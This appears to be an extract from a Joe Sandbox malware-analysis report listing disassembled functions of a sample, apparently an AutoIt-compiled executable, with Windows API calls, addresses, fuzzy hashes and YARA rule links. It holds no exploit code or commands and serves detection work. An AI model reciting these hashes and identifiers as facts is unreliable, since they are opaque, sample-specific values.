Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 3b3a0794100894b487f10a8998e886355c4c7304b809a04133f3f53cf00cc024
Instruction ID: 455028460df54ae4cc27d2cc50a0d382dfaf3fa642a09cf48702528f1bc5a1bf
Opcode Fuzzy Hash: 3b3a0794100894b487f10a8998e886355c4c7304b809a04133f3f53cf00cc024
Instruction Fuzzy Hash: A7515831108201AFDB50EF64D895EAABBEAFF86314F04491DF585872A2DB31E905CF56

Function 006A5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 006A57FB
GetMenuItemCount.USER32(00000000), ref: 006A5832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006A585A
GetMenuItemID.USER32(?,?), ref: 006A58C9
GetSubMenu.USER32(?,?), ref: 006A58D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 006A5928

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 630316ca98c517f2159ce7d1f96f507efb75b5b278e0feff6d70d76a64c01a87
Instruction ID: b7af39619926017521697e097ab5b651e02d17029cdcc652c5e5fad047974d21
Opcode Fuzzy Hash: 630316ca98c517f2159ce7d1f96f507efb75b5b278e0feff6d70d76a64c01a87
Instruction Fuzzy Hash: 6A516D35E00A25EFCF51EFA4C8459AEB7B6EF49320F144469E812BB351CB34AE418F94

Function 0067EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0067EF06
VariantClear.OLEAUT32(00000013), ref: 0067EF78
VariantClear.OLEAUT32(00000000), ref: 0067EFD3
_memmove.LIBCMT ref: 0067EFFD
VariantClear.OLEAUT32(?), ref: 0067F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0067F078

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 24ceff4c54742d91a9fef9f27c07f4390cb914351a44581edef69e396c5633dd
Instruction ID: e5b54a2158aef4796c734bcba351af4e34de7b00e22304efe1c1f3d2e35298aa
Opcode Fuzzy Hash: 24ceff4c54742d91a9fef9f27c07f4390cb914351a44581edef69e396c5633dd
Instruction Fuzzy Hash: 7C5154B5A00209EFCB10DF58C890EAAB7B9FF4D310B15856AE949DB301E335E911CFA0

Function 0068220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00682258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006822A3
IsMenu.USER32(00000000), ref: 006822C3
CreatePopupMenu.USER32 ref: 006822F7
GetMenuItemCount.USER32(000000FF), ref: 00682355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00682386

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 436edc868300fcffcbc328d12de4ec282420a528c7b703c5f126b01b9babbee5
Instruction ID: b8f63a9e5371bac4d67a533dcf637671f5db659cc8d4ea0f9cfc181e93cba41f
Opcode Fuzzy Hash: 436edc868300fcffcbc328d12de4ec282420a528c7b703c5f126b01b9babbee5
Instruction Fuzzy Hash: 7E519E70A0020ADFDF21EF68D8B8BEDBBF6BF45314F104229E851A7290D7749A45CB51

Function 00621765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0062179A
GetWindowRect.USER32(?,?), ref: 006217FE
ScreenToClient.USER32(?,?), ref: 0062181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0062182C
EndPaint.USER32(?,?), ref: 00621876

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 8615920c6d62153ecea6c694ea48c5c0bf0bd86954a3bae73fb126e865d32901
Instruction ID: 86b4ed3640d28c97e36158e7c1ebf91237b74cd4b4406036228fbaddf5c3a7ab
Opcode Fuzzy Hash: 8615920c6d62153ecea6c694ea48c5c0bf0bd86954a3bae73fb126e865d32901
Instruction Fuzzy Hash: 2241C130104B50AFC710EF24DCC4FB67BEAEB56324F141268F9A58B2A1C730A845DF62

Function 006AB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(006E57B0,00000000,016754E0,?,?,006E57B0,?,006AB5A8,?,?), ref: 006AB712
EnableWindow.USER32(00000000,00000000), ref: 006AB736
ShowWindow.USER32(006E57B0,00000000,016754E0,?,?,006E57B0,?,006AB5A8,?,?), ref: 006AB796
ShowWindow.USER32(00000000,00000004,?,006AB5A8,?,?), ref: 006AB7A8
EnableWindow.USER32(00000000,00000001), ref: 006AB7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 006AB7EF

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: efc2247b30c1d91939385ea52aff2f30b0340ab16a482a9fcade70e69ff390f5
Instruction ID: 21262fc8c58e319c6366422d986f261cdd13fb7e06cce8a69f97b41758c69070
Opcode Fuzzy Hash: efc2247b30c1d91939385ea52aff2f30b0340ab16a482a9fcade70e69ff390f5
Instruction Fuzzy Hash: 0F414B34600240AFDB26EF24D499BD4BBE2FB46310F1851A9E9488F6A3C7B1EC56DF51

Function 0069709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00694E41,?,?,00000000,00000001), ref: 006970AC

Part of subcall function 006939A0: GetWindowRect.USER32(?,?), ref: 006939B3

GetDesktopWindow.USER32 ref: 006970D6
GetWindowRect.USER32(00000000), ref: 006970DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0069710F

Part of subcall function 00685244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006852BC

GetCursorPos.USER32(?), ref: 0069713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00697199

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 8331ba7524dba4965f5088044e976c8e07f1c7c37d16b7afe3c75aa066042c16
Instruction ID: b41232dd88eb760a2f9f27c169e93ab01b55ac3946ed41056cc011df374a98fd
Opcode Fuzzy Hash: 8331ba7524dba4965f5088044e976c8e07f1c7c37d16b7afe3c75aa066042c16
Instruction Fuzzy Hash: 3931D272509305ABDB20EF54C849B9BB7EAFF89314F040919F58597291DA30EA09CB92

Function 00678879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006780A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006780C0
Part of subcall function 006780A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006780CA
Part of subcall function 006780A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006780D9
Part of subcall function 006780A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006780E0
Part of subcall function 006780A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006780F6

GetLengthSid.ADVAPI32(?,00000000,0067842F), ref: 006788CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 006788D6
HeapAlloc.KERNEL32(00000000), ref: 006788DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 006788F6
GetProcessHeap.KERNEL32(00000000,00000000,0067842F), ref: 0067890A
HeapFree.KERNEL32(00000000), ref: 00678911

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 0902058155886a10e7e45b4dc3de20bc6623041051d03d5924f96a4ae800bb9d
Instruction ID: 6de13139a6e53c5d055742016ddba3272d50b36310bc7c0f2f9f4d695e11d29b
Opcode Fuzzy Hash: 0902058155886a10e7e45b4dc3de20bc6623041051d03d5924f96a4ae800bb9d
Instruction Fuzzy Hash: F911B131651209FFDB109FA8DC09BFE7B6AEB45311F108168E98997210CB32AD00DF62

Function 006785B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006785E2
OpenProcessToken.ADVAPI32(00000000), ref: 006785E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006785F8
CloseHandle.KERNEL32(00000004), ref: 00678603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00678632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00678646

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 3b8057cb75608b99c534bb8ef083008e17fe207b56640a301da7e04e80f25262
Instruction ID: 6faf70bbdd9a557b40bfa5e3aaf41a3b9616d1591da416bcf9bd1506a09c318f
Opcode Fuzzy Hash: 3b8057cb75608b99c534bb8ef083008e17fe207b56640a301da7e04e80f25262
Instruction Fuzzy Hash: 6D115C72540209AFDF019FE4ED49FDE7BAAEF49304F048064FE04A2160C7719E61DB61

Function 0067B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0067B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 0067B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0067B7CD
ReleaseDC.USER32(00000000,00000000), ref: 0067B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0067B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 0067B7FE

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: a1d30639d9e52ae881a67c5326ba7799b6abef957cc9f61b2905e91f5d1db8e5
Instruction ID: 86bb9120ad456bb2e177708854f4429da6fb292fb251142d3ed835ae2f454650
Opcode Fuzzy Hash: a1d30639d9e52ae881a67c5326ba7799b6abef957cc9f61b2905e91f5d1db8e5
Instruction Fuzzy Hash: B8018475E00209BBEB10ABE69C45B5EBFB9EB49311F009075FA08A7391D6719C00CF91

Function 00640162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00640193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0064019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 006401A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 006401B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 006401B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 006401C1

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: d7d16e1cfe0facd87f7546e9b105cad5cc9d3cc573c800b72ee1b4386cfa2dcb
Instruction ID: 9b170cead01816f48775bddff2091ed510237b8129ec6e92bc15075a8bf64a23
Opcode Fuzzy Hash: d7d16e1cfe0facd87f7546e9b105cad5cc9d3cc573c800b72ee1b4386cfa2dcb
Instruction Fuzzy Hash: 15016CB09017597DE3009F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CFE5

Function 006853E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006853F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0068540F
GetWindowThreadProcessId.USER32(?,?), ref: 0068541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0068542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00685437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0068543E

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 939fd405aa3fe686849e6b71365c9f2e7d73dc10746b32b84c31d1626cd400bb
Instruction ID: f3a0cdd420ef09fe85bef568c8d7966fbed167dcaf3bc4f8c12de09b97834fec
Opcode Fuzzy Hash: 939fd405aa3fe686849e6b71365c9f2e7d73dc10746b32b84c31d1626cd400bb
Instruction Fuzzy Hash: 83F01D32241558BBE7316BE2DC0DEEB7A7DEBC7B11F001169FA05D10519AA12A018AB6

Function 00687230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00687243
EnterCriticalSection.KERNEL32(?,?,00630EE4,?,?), ref: 00687254
TerminateThread.KERNEL32(00000000,000001F6,?,00630EE4,?,?), ref: 00687261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00630EE4,?,?), ref: 0068726E

Part of subcall function 00686C35: CloseHandle.KERNEL32(00000000,?,0068727B,?,00630EE4,?,?), ref: 00686C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00687281
LeaveCriticalSection.KERNEL32(?,?,00630EE4,?,?), ref: 00687288

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 82efacc6de67814584512cc27de4b84f8d9db9da01fe4d8b1d5eefa2f78200c7
Instruction ID: 6d2051bdb58148e81017499cd3f7584ddca11c85bf29849ea8ccd497e836a172
Opcode Fuzzy Hash: 82efacc6de67814584512cc27de4b84f8d9db9da01fe4d8b1d5eefa2f78200c7
Instruction Fuzzy Hash: F2F05E36540612EBD7623BE4ED4CAEA772BEF46702B101631F503910A0DB766A01CF51

Function 00678992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0067899D
UnloadUserProfile.USERENV(?,?), ref: 006789A9
CloseHandle.KERNEL32(?), ref: 006789B2
CloseHandle.KERNEL32(?), ref: 006789BA
GetProcessHeap.KERNEL32(00000000,?), ref: 006789C3
HeapFree.KERNEL32(00000000), ref: 006789CA

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: c05b8c43f7f1217fb6d225d4daa9ea8026ff6902dc885d6fe52d05196a9ade90
Instruction ID: ff11aa5dace3475f7f71ecd2301c3ce310222860071742df050faab2bb6fd243
Opcode Fuzzy Hash: c05b8c43f7f1217fb6d225d4daa9ea8026ff6902dc885d6fe52d05196a9ade90
Instruction Fuzzy Hash: 9AE05276104505FFDB012FE5EC0C95ABB6AFB8A762B509631F21981470CB32A861DF92

Function 00677530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,006B2C7C,?), ref: 006776EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,006B2C7C,?), ref: 00677702
CLSIDFromProgID.OLE32(?,?,00000000,006AFB80,000000FF,?,00000000,00000800,00000000,?,006B2C7C,?), ref: 00677727
_memcmp.LIBCMT ref: 00677748

Strings

,,k, xrefs: 0067753D

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,k
API String ID: 314563124-759674344
Opcode ID: 07e54da62ba8c004c21b040464ebc21987e5794d91aad2237475b4bc91b93c46
Instruction ID: 77b6f678a41412e5069f7387241c12f1e9d1f2ca74b11b83b190f8e9295d3815
Opcode Fuzzy Hash: 07e54da62ba8c004c21b040464ebc21987e5794d91aad2237475b4bc91b93c46
Instruction Fuzzy Hash: 7C81FD75A00119EFCB04DFA4C984DEEB7BAFF89315F208558E505AB250DB71AE46CB60

Function 006985ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00698613
CharUpperBuffW.USER32(?,?), ref: 00698722
VariantClear.OLEAUT32(?), ref: 0069889A

Part of subcall function 00687562: VariantInit.OLEAUT32(00000000), ref: 006875A2
Part of subcall function 00687562: VariantCopy.OLEAUT32(00000000,?), ref: 006875AB
Part of subcall function 00687562: VariantClear.OLEAUT32(00000000), ref: 006875B7

Strings

Incorrect Parameter format, xrefs: 0069864B, 0069880D
AUTOIT.ERROR, xrefs: 00698728

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: d2fdace340943d240a6f0638ec6394e0f2c383f54aa41f66a2daf565fba645c6
Instruction ID: 2d154a699428f45d4810960e5a35ab8b6a8f6ad080598e06f3f9e9ec47be6e56
Opcode Fuzzy Hash: d2fdace340943d240a6f0638ec6394e0f2c383f54aa41f66a2daf565fba645c6
Instruction Fuzzy Hash: 22918170A047019FCB50DF24C48495AB7EAEF8A714F14896EF89A8B361DB31ED45CF62

Function 00682A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0063FC86: _wcscpy.LIBCMT ref: 0063FCA9

_memset.LIBCMT ref: 00682B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00682BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00682C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00682C97

Strings

0, xrefs: 00682B73

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
